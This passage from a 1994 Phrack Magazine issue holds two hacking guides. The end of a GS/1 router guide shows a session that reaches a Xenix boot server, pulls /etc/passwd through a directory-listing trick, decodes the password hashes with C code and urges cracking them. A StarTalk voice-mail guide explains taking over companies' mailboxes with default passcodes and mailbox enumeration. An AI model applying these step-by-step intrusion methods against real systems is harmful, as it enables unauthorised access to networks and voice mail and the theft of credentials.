  13243. > WelcomeString = "Welcome to your haqued server (!2), Connected to "
  13244. > DOmain = "thelabz"                      Organization = "delam0"
  13245. > PROmpt = "GS/1>"                        NMPrompt = "GS/1# "
  13246. > LocalPassWord = ""                      GlobalPassWord = "haque-me"
  13247. > NetMapBroadcast = ON                    MacType = EtherNET
  13248. > CONNectAudit = ON                       ERRorAudit = ON
  13249. > AUditServerAddress = &000031A4%07000200A3D4
  13250. > AUditTrailType = Local
  13251. > BootServerAddress = &00000000%070002017781
  13252.  
  13253. Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
  13254. ... these are the actual passwords that need to be entered (or in the case
  13255. of the LocalPassWord, "" matches any string).  You'll only be able to
  13256. "sh global" after a successful "set priv=global".
  13257.  
  13258. Now that you have the boot server address, the next step is enabling
  13259. communication to the boot server.
  13260.  
  13261.  
  13262.  
  13263.               +-------------------------------------+
  13264.               +  #5. Connecting to the boot server  +
  13265.               +-------------------------------------+
  13266.  
  13267. Do a REMOTE <address> where address is the address of the machine you
  13268. want to issue remote commands to.
  13269.  
  13270. > (!2) GS/1# REMOTE %070002017781
  13271. > (!2) Remote: ?
  13272. >       BInd        <address> [-f <bootfile>] [-l <loader>] [<nports>]
  13273. >       BRoadcast   ( <address> ) "<string>"
  13274. >       CoPyfile    [<address>:]<pathname> [<address>:][<pathname>]
  13275. >       LiSt        [ -ls1CR ] [<pathname> ...]
  13276. >       MoVe        <pathname> <pathname>
  13277. >       NAme        <clearinghouse name> = <address>[,<address>]...
  13278. >       Ping        <address> [timeout]
  13279. >       ReMove      <pathname> ...
  13280. >       SET         [( <address> )] <param-name> = <value> ...
  13281. >       SETDefault  <param-name> = <value> ...
  13282. >       SHow        <argument>
  13283. >       UNBind      <address>
  13284. >       UNDefine    <macro name>
  13285. >       UNName      <name>
  13286. >       ZeroStats
  13287. >       <BREAK>     (to leave remote mode)
  13288.  
  13289. Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
  13290. you will be issuing commands to whatever remote machine you specified
  13291. by the REMOTE <address> command.
  13292.  
  13293. Notice for this case, the boot server's address was used.
  13294.  
  13295. When you get the REMOTE: prompt, you can issue commands that will be
  13296. executed on the remote machine.  Try doing a '?' to see if it's another
  13297. GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
  13298.  
  13299. Also notice that the help commands on the remote are not the same as
  13300. those for the GS/1 (though, if you establish a remote link with another
  13301. GS/1 they will be the same).
  13302.  
  13303. > (!2) Remote: ls -l
  13304. > total 1174
  13305. > drwxrwxrwx   2 ncs      ncs          160 Aug 17  1989 AC
  13306. > drwxrwxrwx   2 ncs      ncs         5920 Jun  5 00:00 AUDIT_TRAIL
  13307. > drwxrwxrwx   2 ncs      ncs           96 Jun  5 01:00 BACKUP
  13308. > drwxrwxrwx   2 ncs      ncs          240 Jun  4 04:42 BIN
  13309. > drwxrwxrwx   2 ncs      ncs          192 Jun  4 04:13 CONFIGS
  13310. > drwxrwxrwx   2 ncs      ncs           64 Aug 17  1989 DUMP
  13311. > drwxrwxrwx   2 ncs      ncs           80 Aug 17  1989 ETC
  13312. > drwxrwxrwx   2 ncs      ncs          160 Jun  4 04:13 GLOBALS
  13313. > -rw-r--r--   1 ncs      ncs          228 Jun  5 00:59 btdata
  13314. > -rw-r--r--   1 ncs      ncs         8192 Jun  8  1993 chnames.dir
  13315. > -rw-r--r--   1 ncs      ncs        11264 Jun  1 13:41 chnames.pag
  13316. > drwxrwxrwx   2 ncs      ncs           48 Jun  5 00:00 dev
  13317. > drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
  13318. > -rw-rw-rw-   1 ncs      ncs       557056 Mar 23  1992 macros
  13319. > -rw-r--r--   1 ncs      ncs          512 Oct 22  1993 passwd
  13320.  
  13321. Look familiar??  If not, go to the nearest convenient store and buy the
  13322. a 12 pack of the cheapest beer you can find.. leave your computer
  13323. connected so you hurry back, and slam eight or nine cold onez... then
  13324. look at the screen again.
  13325.  
  13326. You're basically doing a Remote Procedure Call for ls to your Xenix boot
  13327. server.
  13328.  
  13329. Notice at this point that the "passwd" is not owned by root.  This is
  13330. because this is not the system password file, and you are not in the
  13331. "/etc" directory... (yet)
  13332.  
  13333. There are a couple of problems:
  13334.  
  13335. > (!2) Remote: cat
  13336. > Invalid REMOTE command
  13337. >
  13338. > (!2) Remote: cd /etc
  13339. > Invalid REMOTE command
  13340.  
  13341. You cannot view files and you cannot change directories.
  13342.  
  13343. To solve the "cd" problem do the following:
  13344.  
  13345. > (!2) Remote: ls -l ..
  13346. > total 26
  13347. > drwxrwxrwx  12 root     root         352 Jun  5 00:59 NCS
  13348. > drwxr-xr-x   2 bin      bin          112 Aug 17  1989 adm
  13349. > drwxrwx---   2 sysinfo  sysinfo       48 Aug 17  1989 backup
  13350. > drwxr-xr-x   2 bin      bin         1552 Aug 17  1989 bin
  13351. > drwxr-xr-x  20 bin      bin          720 Aug 17  1989 lib
  13352. > drwxrwxrwx   6 ncs      ncs          224 Aug 17  1989 ncs
  13353. > drwxr-xr-x   2 bin      bin           32 Aug 17  1989 preserve
  13354. > drwxr-xr-x   2 bin      bin           64 Aug 17  1989 pub
  13355. > drwxr-xr-x   7 bin      bin          144 Aug 17  1989 spool
  13356. > drwxr-xr-x   9 bin      bin          144 Aug 17  1989 sys
  13357. > drwxr-x---   2 root     root          48 Aug 17  1989 sysadm
  13358. > drwxrwxrwx   2 bin      bin           48 Jun  5 01:00 tmp
  13359. >
  13360. > (!2) Remote: ls -l ../..
  13361. > total 1402
  13362. > -rw-r--r--   1 root     root        1605 Aug 17  1989 .login
  13363. > -r--r--r--   1 ncs      ncs         1605 Aug 28  1990 .login.ncs
  13364. > -rw-r--r--   1 root     root         653 Aug 17  1989 .logout
  13365. > -r--r--r--   1 ncs      ncs          653 Aug 28  1990 .logout.ncs
  13366. > -rw-------   1 root     root         427 Aug 17  1989 .profile
  13367. > drwxr-xr-x   2 bin      bin         2048 Aug 17  1989 bin
  13368. > -r--------   1 bin      bin        25526 May  4  1989 boot
  13369. > drwxr-xr-x   6 bin      bin         3776 Aug 17  1989 dev
  13370. > -r--------   1 bin      bin          577 Nov  3  1987 dos
  13371. > drwxr-xr-x   5 bin      bin         1904 Jun  2 12:40 etc
  13372. > drwxr-xr-x   2 bin      bin           64 Aug 17  1989 lib
  13373. > drwx------   2 bin      bin         1024 Aug 17  1989 lost+found
  13374. > drwxr-xr-x   2 bin      bin           32 Aug 17  1989 mnt
  13375. > drwxrwxrwx   2 bin      bin          512 Jun  5 01:20 tmp
  13376. > drwxr-xr-x  14 bin      bin          224 Aug 17  1989 usr
  13377. > -rw-r--r--   1 bin      bin       373107 Aug 17  1989 xenix
  13378. > -rw-r--r--   1 root     root      287702 Aug 17  1989 xenix.old
  13379.  
  13380. Your brain should now experience deja vous.. you just found the
  13381. root directory.  (for the non-*nix, lam0-hacker, the root directory
  13382. has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
  13383.  
  13384. Now you can get to /etc/passwd as follows:
  13385.  
  13386. > (!2) Remote: ls -l ../../etc
  13387. > total 1954
  13388. > -rwx--x--x   1 bin      bin         7110 May  8  1989 accton
  13389. > -rwx------   1 bin      bin         1943 May  8  1989 asktime
  13390. > -rwx------   1 bin      bin        31756 May  8  1989 badtrk
  13391. > -rw-rw-rw-   1 root     root        1200 Apr 24 12:40 bootlog
  13392. > -rwx--x--x   1 bin      bin        24726 May  8  1989 brand
  13393. > -rw-r--r--   1 bin      bin           17 Aug 17  1989 checklist
  13394. > -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.last
  13395. > -rw-r--r--   1 ncs      ncs           17 Aug 28  1990 checklist.ncs
  13396. > -rw-r--r--   2 bin      bin           17 Aug 17  1989 checklist.orig
  13397. > -rwx------   1 bin      bin         2857 May  8  1989 chsh
  13398. > -rwx------   1 bin      bin         7550 May  8  1989 clri
  13399. > -rwx------   1 bin      bin         8034 May  8  1989 cmos
  13400. > -rwxr-xr-x   1 root     bin        31090 Aug 28  1990 cron
  13401. > -rw-r--r--   1 bin      bin          369 May  8  1989 cshrc
  13402. > ...... etc.
  13403. > -rw-r--r--   1 root     root         465 Mar  5  1991 passwd
  13404.  
  13405. Yeah, now what?!
  13406.  
  13407. You've found the /etc/passwd file, but you don't have "cat" to type the
  13408. file out.  Now you're stuck... so drink a half a bottle of Sysco per
  13409. person. (We did... and as you'll see, Sysco is the drink of a manly hackers
  13410. like us... make sure it's the big bottle kind not those girly small
  13411. onez.)
  13412.  
  13413.  
  13414.  
  13415.             +---------------------------------------------+
  13416.             +  #6. Getting the boot server password file  +
  13417.             +---------------------------------------------+
  13418.  
  13419. There is one way to get around the cat problem (no itz n0t puttin
  13420. catnip laced with somethin U made frum a phile on yer doorstep)
  13421. It's done using ls.  On this Xenix system, the directory structure is
  13422. the old Unix format: A 16 byte record comprised of a 2 byte I-number
  13423. and a 14 byte character field.
  13424.  
  13425.    Note about directory structure for the inquisitive hacker:
  13426.    In a directory record there is a 14 byte string containing the file
  13427.    name, and the 2 byte I-number (2 bytes = an integer in this case)
  13428.    which is a number that is an (I)ndex pointer to the I-node.  The
  13429.    I-node then contains the information about where the file's data is
  13430.    actually kept (similar to how a FAT table works on an IBM PC yet a
  13431.    different concept as it has indirect index blocks etc. I won't get
  13432.    into) and what permissions are set for the file.  Be warned that in
  13433.    newer *nix implementations, file names can be more than 14 characters
  13434.    and the directory structure will be a bit different than discussed.
  13435.  
  13436. The "ls" command has an option that allows you to tell it "this *file* is
  13437. a *directory*.. so show me what's in the directory"... newer *nix
  13438. systems won't like this (the -f option) because of the new directory
  13439. structure.
  13440.  
  13441. > (!2) Remote: ls -?
  13442. > ls: illegal option --?
  13443. > usage:  -1ACFRabcdfgilmnopqrstux [files]
  13444. >
  13445. > (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
  13446. > 28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
  13447. > 25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
  13448. > 29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
  13449. > 28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
  13450. > 28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
  13451. > 29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
  13452. > 20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
  13453. > 26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
  13454. > 12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
  13455. > 29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
  13456. > 29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
  13457. > 18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFnHnL
  13458. > 22327 xcU:100:100:NC    8275 operator:/usr/
  13459. >
  13460. > (!2) Remote: <BRK>
  13461. > (!2) GS/1#
  13462.  
  13463. Wow, kewl.  Now that you have a bunch-o-shit on your screen, you have
  13464. to make some sense out of it.
  13465.  
  13466. The password file is almost legible, but the I-numbers still need to be
  13467. converted to ASCII characters.  This can be accomplished in a variety of
  13468. ways... the easiest is to write a program like the following in C:
  13469.  
  13470. On a PC the following code should work:
  13471.  
  13472. #include <stdio.h>
  13473. main()
  13474. {
  13475.    union {
  13476.       int i;
  13477.       char c[2];
  13478.    } x;
  13479.    while (1) {
  13480.       printf("Enter I-Number: ");
  13481.       scanf("%d", &x.i);
  13482.       printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
  13483.    }
  13484. }
  13485.  
  13486. On a *nix based system the following code will work (depending on
  13487. word size and byte arrangement):
  13488.  
  13489. #include <stdio.h>
  13490. main()
  13491. {
  13492.    union {
  13493.       short int i;
  13494.       char c[2];
  13495.    } x;
  13496.    while (1) {
  13497.       printf("Enter I-Number: ");
  13498.       scanf("%hd", &x.i);
  13499.       printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
  13500.    }
  13501. }
  13502.  
  13503.  
  13504. When you have translated the I-numbers you can substitute the ASCII
  13505. values by hand (or write a d0p3 program to do it for you):
  13506.  
  13507. 28530 ot:BJlx/e8APHe   30580 :0:0:Super use   14962 /:/bin/csh?sys
  13508. 28530 = [r][o]         30580 = [t][w]         14962 = [r][:]
  13509. root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
  13510.  
  13511. 25697 m:X/haSqFDwHz1   14929 0:0:System Adm   28265 istration:/usr
  13512. 25697 = [a][d]         14929 = [Q][:]         28265 = [i][n]
  13513. adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
  13514.  
  13515. 29487 ysadm:/bin/sh?   29283 on:NOLOGIN:1:1   17210 ron daemon for
  13516. 29487 = [/][s]         29283 = [c][r]         17210 = [:][C]
  13517. /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
  13518.  
  13519. 28704 eriodic tasks:   14895 ?bin:NOLOGIN:3   13114 :System file a
  13520. 28704 = [ ][p]         14895 = [/][:]         13114 = [:][3]
  13521.  periodic tasks:/:?bin:NOLOGIN:3:3:System file a
  13522.  
  13523. 28004 inistration:/:   29962 ucp::4:4:Uucp    25697 ministration:/
  13524. 28004 = [d][m]         29962 = [^M][u]        25697 = [a][d]
  13525. dministration:/:
  13526. uucp::4:4:Uucp administration:/
  13527.  
  13528. 29557 r/spool/uucppu   27746 ic:/usr/lib/uu   28771 /uucico?asg:NO
  13529. 29557 = [u][s]         27746 = [b][l]         28771 = [c][p]
  13530. usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
  13531.  
  13532. 20300 GIN:6:6:Assign   25185 le device admi   26990 stration:/:?sy
  13533. 20300 = [L][O]         25185 = [a][b]         26990 = [n][i]
  13534. LOGIN:6:6:Assignable device administration:/:?sy
  13535.  
  13536. 26995 nfo:NOLOGIN:10   12602 0:Access to sy   29811 em information
  13537. 26995 = [s][i]         12602 = [:][1]         29811 = [s][t]
  13538. sinfo:NOLOGIN:10:10:Access to system information
  13539.  
  13540. 12090 :?network:NOLO   18759 N:12:12:Mail a   25710  Network admin
  13541. 12090 = [:][/]         18759 = [G][I]         25710 = [n][d]
  13542. :/:?network:NOLOGIN:12:12:Mail and Network admin
  13543.  
  13544. 29545 tration:/usr/s   28528 ol/micnet:?lp:   20302 LOGIN:14:3:Pri
  13545. 29545 = [i][s]         28528 = [p][o]         20302 = [N][O]
  13546. istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
  13547.  
  13548. 29806  spooler admin   29545 tration:/usr/s   28528 ol/lp:?dos:NOL
  13549. 29806 = [n][t]         29545 = [i][s]         28528 = [p][o]
  13550. nt spooler administration:/usr/spool/lp:?dos:NOL
  13551.  
  13552. 18255 IN:16:10:Acces    8307 to Dos devices   12090 :?ncs:yYNFmHnL
  13553. 18255 = [O][G]          8307 = [s][ ]         12090 = [:][/]
  13554. OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
  13555.  
  13556. 22327 xcU:100:100:NC    8275 operator:/usr/
  13557. 22327 = [7][W]          8275 = [S][ ]
  13558. 7WxcU:100:100:NCS operator:/usr
  13559.  
  13560.  
  13561. The resulting file will look like the following:
  13562.  
  13563. root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
  13564. adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
  13565. /sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
  13566.  periodic tasks:/:?bin:NOLOGIN:3:3:System file a
  13567. dministration:/:
  13568. uucp::4:4:Uucp administration:/
  13569. usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
  13570. LOGIN:6:6:Assignable device administration:/:?sy
  13571. sinfo:NOLOGIN:10:10:Access to system information
  13572. :/:?network:NOLOGIN:12:12:Mail and Network admin
  13573. istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
  13574. nt spooler administration:/usr/spool/lp:?dos:NOL
  13575. OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
  13576. 7WxcU:100:100:NCS operator:/usr
  13577.  
  13578. Because the ls command cannot display "non-printable" characters such
  13579. as the carriage return, it will replace them with a '?' character...
  13580. delete the '?' characters and divide by line at these locations.  When
  13581. you finish doing that, you'll have a standard /etc/passwd file:
  13582.  
  13583. root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
  13584. sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
  13585. cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
  13586. bin:NOLOGIN:3:3:System file administration:/:
  13587. uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
  13588. asg:NOLOGIN:6:6:Assignable device administration:/:
  13589. sysinfo:NOLOGIN:10:10:Access to system information:/:
  13590. network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
  13591. lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
  13592. dos:NOLOGIN:16:10:Access to Dos devices:/:
  13593. ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
  13594.  
  13595. Once you've assembled your password file in a standard ASCII form,
  13596. you'll of course want to crack it with one of the many available DES
  13597. cracking programs.
  13598.  
  13599. +---------------------+
  13600. +  #7: Other Avenues  +
  13601. +---------------------+
  13602.  
  13603. Find out what else you can play with by first finding what networks are
  13604. available other than your own, and second, find out what machines are on
  13605. your network:
  13606.  
  13607. >(!2) GS/1# sh att
  13608. >                               Attached Networks
  13609. >&000023B5
  13610. >(!2) GS/1# sh nmap l
  13611. >                             NETWORK &000023B5 MAP
  13612. >
  13613. >  1-%070002017781 SW/AT-NCS       3.0.2  2-%070002A049C5 SW/NB-BR-3.1.1.1
  13614. >  3-%0700020269A7 SW/200-A/BSC/SDL22000  4-%07000201C089 SW/200-A/BSC/SDL22020
  13615. >  5-%070002023644 SW/200-A/BSC/SDL22020  6-%0700020138B2 SW/AT-NCS       2.1.1
  13616. >  7-%070002010855 SW/100-A/BSC    20060  8-%070002018BA2 SW/20-XNS-X.25  .0.2
  13617. > .... etc.
  13618.  
  13619. The boot server address, from previous examples, is number 1
  13620. which contains a description "SW/AT-NCS".  Examining the rest of the
  13621. list, number 6 has the same description.  System 12 may be just another
  13622. address for the boot server or it may be a different Xenix... but it should
  13623. be Xenix whatever it is.
  13624.  
  13625. We have refrained from covering the typical GS/1 information that has been
  13626. published by others; and instead, covered newer concepts in GS/1 hacking.
  13627. This phile is not a complete guide to GS/1 hacking; but expect successive
  13628. publications on the topic.
  13629.  
  13630.  
  13631.  
  13632.  
  13633.  
  13634.  
  13635.                               ==Phrack Magazine==
  13636.  
  13637.                  Volume Five, Issue Forty-Six, File 18 of 26
  13638.  
  13639. ****************************************************************************
  13640.  
  13641.       ***** ********  ****     *****  ********  ****    **     **   **
  13642.      *****    ****   **  **   **   **   ****   **  **   **     ** ***
  13643.        ****   ****  ** ** **  ** **     ****  ** ** **  **     *****
  13644.      *****    **** **      ** **  ***   **** **      ** ****** **  ***
  13645.  
  13646.              (*)  A Complete 'N Easy Guide to Hacking and the (*)
  13647.                 (*) Usage of "StarTalk" Voice Mail Systems (*)
  13648.  
  13649.                            Written By: The Red Skull
  13650.                                    07/25/94
  13651.  
  13652.                                  Introduction
  13653.                                  ~~~~~~~~~~~~
  13654.       There are many types of different voice mail systems out there, that
  13655. run on phone systems they are compatible with.  You have probably seen a lot
  13656. of text files about hacking voice mail systems, on your local bulletin
  13657. boards.  The popular ones you might have heard about are systems like, Aspen
  13658. (Automatic Speech Exchange Network), TMC (The Message Center), Audix, and
  13659. Meridian Mail.  There are VMB hacking programs that are suppose to hack vmbs
  13660. for you.  I really don't believe in those kind of programs.  When I say this,
  13661. I am not talking about programs like Tone Locator or Blue Beep, I am talking
  13662. about programs like 'The Aspen Hacker' and any other *VMB* hacking programs.
  13663. I am just saying this, so you don't mix this guide up with a vmb hacking
  13664. program.
  13665.  
  13666.                              General Information
  13667.                              ~~~~~~~~~~~~~~~~~~~
  13668.      I have decided to write a hacking/user's guide for the StarTalk Voice
  13669. Mail System because there is no guide for the StarTalk Voice Mail System,
  13670. and almost no one has heard about it.  Since this will be the first one for
  13671. it, I will try and explain it as simply as possible.  You might have heard
  13672. of Northern Telecom.  They are the makers of StarTalk, but they are also the
  13673. makers of a very popular user-friendly Voice Mail System called 'Meridian
  13674. Mail'.  Both StarTalk and Meridian Mail run on the Norstar telephone system.
  13675. StarTalk is designed to function as an extension of the Norstar telephone
  13676. system.  All the StarTalk software operation is done on a Norstar telephone
  13677. set, so that means it doesn't run on a computer terminal.  There are 3
  13678. different sizes and configurations that the StarTalk Voice Mail System
  13679. comes with -
  13680.  
  13681.  o Model 110 - 2 voice channels, with 1 hour and 50
  13682.                minutes total storage.
  13683.  
  13684.  o Model 165 - 4 voice channels, with 2 hours and 45
  13685.                minutes total storage.
  13686.  
  13687.  o Model 385 - 4 voice channels, with 6 hours and 25
  13688.                minutes total storage.
  13689.                The capabilities of StarTalk Model 385
  13690.                can be further expanded through an
  13691.                enhancement option, available in 4, 6
  13692.                or 8 channel versions, which provides
  13693.                a total of 9 hours an 45 minutes of
  13694.                storage.
  13695.  
  13696.      Right now, you might be wondering what the hell i'm talking about, but
  13697. it's simple.  The number of voice channels means how many voice mail users
  13698. could be using their voice mail.  So for example, 4 voice channels, means only
  13699. 4 voice mail users could be on the voice mail system.  The Model 110 can hold
  13700. about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120
  13701. boxes and higher.  So, it's better if you find a StarTalk Voice Mail System
  13702. that is running Model 385.  The part that says 'with 6 hours and 25 minutes
  13703. total storage', means how many hours of messages it can store.  The Model 385
  13704. is also upgradable.  I could go on about the models but that's all we need to
  13705. know for now.  So now that we've finished this, we will get into the part
  13706. that you've been waiting for.
  13707.  
  13708.                      Finding a StarTalk Voice Mail System
  13709.                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13710.      You will probably not be able to recognize a StarTalk voice mail system
  13711. if you find one using a war dialer, because when a StarTalk system answers,
  13712. it will only have the company's personalized automated greeting.  There are
  13713. only two ways to get a StarTalk system:  you either scan it out yourself or
  13714. get it from someone else.  If you get it from someone else, all the boxes
  13715. will probably be gone, used or just not safe.
  13716.  
  13717.                    Recognizing a StarTalk Voice Mail System
  13718.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13719.      Ok, now let's say you have come across a StarTalk system, how do you
  13720. know that it's a StarTalk?  As I said, you will not be able to tell if it's a
  13721. StarTalk system by just calling it.  If the system is a Startalk, when the
  13722. company's personalized greeting answers, press '*' and it should say -
  13723.  
  13724. "Please enter the mailbox number, or press the # sign to use the directory"
  13725.  
  13726. Remember, if you press '*' and just sit there, it will repeat the message
  13727. one more `time, and then say "Exiting the system."
  13728.  
  13729. If you hit '**' it should say -
  13730.  
  13731. "Please enter your mailbox number and your password, then press # sign"
  13732.  
  13733. If you don't get anything like this, that means it's not a StarTalk Voice
  13734. Mail System.  If you are still not sure that you have a StarTalk System,
  13735. then you can always call 416-777-2020 and listen to the voice and see
  13736. if it matches with what you have found.
  13737.  
  13738.                            Finding a Virgin Box
  13739.                            ~~~~~~~~~~~~~~~~~~~~
  13740.      This is a very interesting step and also an easy one.  Once you have
  13741. found a StarTalk Voice Mail System, the first thing you'll want to do is
  13742. get some boxes on it.  The interesting part is that you are always guaranteed
  13743. to get one box on a StarTalk System.  This is because every StarTalk System
  13744. has a box that is for the voice mail users to leave any problems they are
  13745. experiencing with their vmb.  This is the box that almost always has a default
  13746. on it, but if the System Admin is smart he will change it.  So far, on all the
  13747. StarTalk systems that I have come across the default for this box hasn't been
  13748. changed.  The box number is '101' and the defaults for StarTalk Voice Mail
  13749. systems are '0000'.  So the first thing you should do is call up the system
  13750. and press *101 and the default greeting on the box should say (this greeting
  13751. is for box 101 only) -
  13752.  
  13753. "This is the Trouble-Report mailbox, if you are experiencing difficulty
  13754.  using the messaging features, please leave your name, mailbox # and a
  13755.  detailed description of the problem" *BEEP*
  13756.  
  13757. If it says that, press '**' and then when it asks you to enter your mailbox
  13758. number and your password, enter '1010000' and press the # sign.  If you've
  13759. followed everything I've said and the System Admin hasn't changed the
  13760. default on this box, it should go ahead and ask you to enter your new
  13761. personal mailbox password.  There is another box number which is sometimes
  13762. at the default which is the System Admin's box at 102.  Although this is a
  13763. System Admin box, the only System Admin option it has available is to leave
  13764. a broadcast message, which leaves a message to all boxes on the system.
  13765. This box will have the regular default greeting which is -
  13766.  
  13767. "This mailbox is not initialized and cannot accept messages, please
  13768.  try again later"
  13769.  
  13770. Do the same thing you did before, If it says that, press '**' and then when
  13771. it asks you to enter your mailbox number and your password, enter '1020000'
  13772. and press the # sign.  If everything is fine, it should ask you to enter your
  13773. new personal mailbox password.  This is called Initializing your mailbox, and
  13774. I'll talk about this later in this file.  So, there you go, you've got your
  13775. box on a StarTalk System.  All StarTalk Voice Mail Systems that I have run
  13776. into so far have had 2-3 digit mailboxes.  Now, to hack any other boxes
  13777. through the system, you would have to go and keep on trying 3 digit mailbox
  13778. number starting with 1XX, until you find an empty box with a regular default
  13779. greeting.  Let's say you find another empty box at box number 130, you will do
  13780. the same thing, press '**' and when it asks you to enter your mailbox number
  13781. and your password, enter '1300000' and press the # sign.  One thing I like
  13782. about box number '101' is that, a lot of System Admin's are not aware that it
  13783. even exists, that is because they probably have a lousy TSR (Technical Service
  13784. Rep).  (This is the person that is suppose to help them install the Voice
  13785. Mail System.)
  13786.  
  13787.             What to do After you've Got A StarTalk Voice Mail Box
  13788.             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  13789. The rest of the file will concentrate on all the inside functions and
  13790. options that a StarTalk Voice Mail Box has.  We will be covering all
  13791. these topics -
  13792.  
  13793.  o Initializing a Mailbox
  13794.  o Your Mailbox Greeting
  13795.  o Recording a Greeting
  13796.  o Choosing a Mailbox Greeting
  13797.  o Listening To Messages
  13798.  o Off-premise Message Notification
  13799.  o Setting Up Off-premise Message Notification
  13800.  o Disabling Off-premise Message Notification
  13801.  o Changing Off-premise Message Notification
  13802.  o Leaving a Mailbox Message
  13803.  o Message Delivery Options
  13804.  o Assigning the Target Attendant
  13805.  o Quick Reference Tips
  13806.  
  13807.                                  Your Mailbox
  13808.                                  ~~~~~~~~~~~~
  13809.      Before you can use your mailbox, you must:
  13810.  
  13811.      - open your mailbox
  13812.      - change your password
  13813.      - record your name
  13814.      - record your personal mailbox greeting(s)
  13815.  
  13816. This is called Initializing your mailbox.
  13817.  
  13818. Initializing a Mailbox
  13819. ----------------------
  13820. To open and initialize your mailbox:
  13821.  
  13822. 1. Press * * and Mailbox #
  13823. 2. Enter the default password '0000'
  13824. 3. To end the password, press #
  13825. 4. The StarTalk voice prompt, asks you to enter your new personal mailbox
  13826.    password.
  13827. 5. Using touchtones, enter your new mailbox password.  Your password can
  13828.    be from 4 to 8 digits long, but it cannot start with zero.
  13829. 6. To end your password, press #
  13830. 7. After you have accepted your password, you are asked to record your name
  13831.    in the Company Directory, At the tone, record your name.
  13832. 8. To end your recording, press #
  13833. 9. To accept your recording, press #
  13834.  
  13835. You are now ready to record your personal mailbox greetings.  Once your
  13836. greetings are recorded, you have the option of selecting either your primary
  13837. or alternate greeting.  If you do not select a greeting, your primary
  13838. greeting plays automatically.
  13839.  
  13840. Note: Initializing a mailbox is only done the first time you open your
  13841. mailbox.  You have to initialize your mailbox to receive messages.
  13842.  
  13843.                             Your Mailbox Greeting
  13844.                             ~~~~~~~~~~~~~~~~~~~~~
  13845.       Each mailbox has a primary and alternate greeting recorded by you.
  13846. After you have recorded your personal mailbox greetings, you can choose
  13847. which greeting you play to callers reaching your mailbox.
  13848.  
  13849. Recording a Greeting
  13850. --------------------
  13851. To record your greetings, you must first open your mailbox.  Once you have
  13852. opened your mailbox:
  13853.  
  13854. 1. Press 8
  13855. 2. To select Greeting Options, press 2
  13856. 3. To record your greeting, press 1
  13857. 4. Select which greeting you are going to record.
  13858.    Note: You can choose to record either your primary or alternate mailbox
  13859.    greeting.
  13860. 5. To record your greeting, press 1
  13861. 6. At the tone, record your greeting.
  13862. 7. To end your greeting, press #
  13863. 8. To accept this recording, press #
  13864.  
  13865. Choosing a Mailbox Greeting
  13866. ---------------------------
  13867. After the mailbox greeting is recorded, you can choose which greeting you
  13868. are going to use.  If you do not choose a mailbox greeting, Startalk
  13869. automatically plays your primary greeting.  To choose a mailbox greeting
  13870. you must open your mailbox. Once you have opened your mailbox:
  13871.  
  13872. 1. Press 8
  13873. 2. To select Greeting Options, press 2
  13874. 3. Press 2
  13875. 4. Select which mailbox greeting your mailbox is going to use.
  13876.  
  13877. Listening To Messages
  13878. ---------------------
  13879. Each time you open your mailbox, StarTalk plays any Broadcast messages left
  13880. by the System Admin (don't reply to them!), and also tells you how many other
  13881. messages are in your mailbox.  Messages are played beginning with any Urgent
  13882. messages, followed by the first message left in your mailbox.
  13883.  
  13884. To listen to messages, you must open your mailbox.  Once you have opened
  13885. your mailbox:
  13886.  
  13887. 1.  To listen to messages, press 2 or to listen to your saved messages,
  13888.     press 6
  13889.  
  13890. Your first message starts to play.  While listening to a message, or after
  13891. a message has played, you can:
  13892.  
  13893. Replay the message          : 1 1
  13894. Back up 9 seconds           : 1
  13895. Pause and Continue          : 2 to pause then 2 to continue
  13896. Forward 9 seconds           : 3
  13897. Skip to the end of message  : 3 3
  13898. Play the previous message   : 4
  13899. Forward the message         : 5
  13900. Skip to the next message    : 6
